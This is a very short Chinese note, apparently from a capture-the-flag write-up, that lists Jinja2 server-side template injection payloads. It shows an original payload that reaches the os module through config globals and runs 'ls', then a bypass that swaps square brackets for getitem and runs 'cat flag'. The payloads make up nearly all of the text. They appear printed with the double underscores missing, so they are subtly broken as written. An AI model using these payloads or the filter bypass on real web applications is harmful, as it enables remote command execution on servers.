原payload:
{{ config.class.init.globals[‘os’].popen(‘ls’).read() }}
中括号能用getitem绕过
{{ config.class.init.globals.getitem(‘os’).popen(‘ls’).read() }}
{{ config.class.init.globals.getitem(‘os’).popen(‘cat flag’).read() }}
若有收获,就点个赞吧
0 人点赞
